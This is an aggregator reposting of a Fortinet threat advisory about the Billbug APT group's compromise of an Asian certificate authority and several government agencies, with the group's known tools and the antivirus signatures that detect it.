One Article Review
| Source |  Fortinet ThreatSignal |
|---|---|
| Identifiant | 8156663 |
| Date de publication | 2022-11-21 22:02:17 (vue: 2022-11-22 07:05:46) |
| Titre | APT Billbug Victimized Asian Certification Authority and Government Agencies |
| Texte | FortiGuard Labs is aware of a report that APT group "Billbug" compromised a certificate authority (CA) as well as multiple government and defense organizations in Asia. Also known as Lotus Blossom and Thrip, the APT group reportedly has been active since 2009 and uses custom backdoor malware "Hannotog" and "Sagerunex" as well as available tools in compromised machines.Why is this Significant?This is significant because Billbug APT threat actor group targeted a certificate authority (CA). Should digital certificates be compromised, the attacker could use them to sign malware for detection evasion by security solutions and eavesdrop on HTTPS communications.Also, the reports indicate that multiple organizations in government and defense sectors in Asia were compromised by Billbug APT. What is Billbug APT?Billbug, Lotus Blossom and Thrip, is a threat actor that has been reportedly active since at last 2009 and has interests in U.S. organizations as well as government, defense, and communications organizations in Southeast Asia. Their primary motive is thought to be information espionage.Billbug APT employs living-off-the-land techniques and uses custom malware. The tools that were reportedly used by Billbug APT are the following:Hannotog backdoorSagerunex backdoorAdFindCertutilLogMeInMimikatzNBTscanPingPort ScannerPowerShellPsExecRouteTracertWinmailWinRARWinSCPWhat is the Status of Coverage?FortiGuard Labs detects the files in the report with the following AV signatures:W32/Agent.QTP!trW32/Elsentric.J!trW32/Generic.A!trW32/PossibleThreatW64/Agentb.F!trW64/Agent.LF!trW64/Elsentric.E!trW64/Elsentric.G!trMalicious_Behavior.SBPossibleThreat.PALLAS.HRiskware/Kryptik |
| Envoyé | Oui |
| Condensat | 2009 active actor agencies also apt are asia asian attacker authority available aware backdoor backdooradfindcertutillogmeinmimikatznbtscanpingport backdoorsagerunex because been behavior billbug blossom certificate certificates certification communications compromised could coverage custom defense detection detects digital eavesdrop employs espionage evasion files following following:hannotog fortiguard government group hannotog has hriskware/kryptik https indicate information interests known labs land last living lotus machines malware motive multiple off organizations pallas primary qtp report reportedly reports sagerunex sbpossiblethreat scannerpowershellpsexecroutetracertwinmailwinrarwinscpwhat sectors security should sign signatures:w32/agent significant since solutions southeast status targeted techniques them thought threat thrip tools trmalicious trw32/elsentric trw32/generic trw32/possiblethreatw64/agentb trw64/agent trw64/elsentric use used uses victimized well what why |
| Tags | Malware Threat |
| Stories | |
| Notes | ★★★★ |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.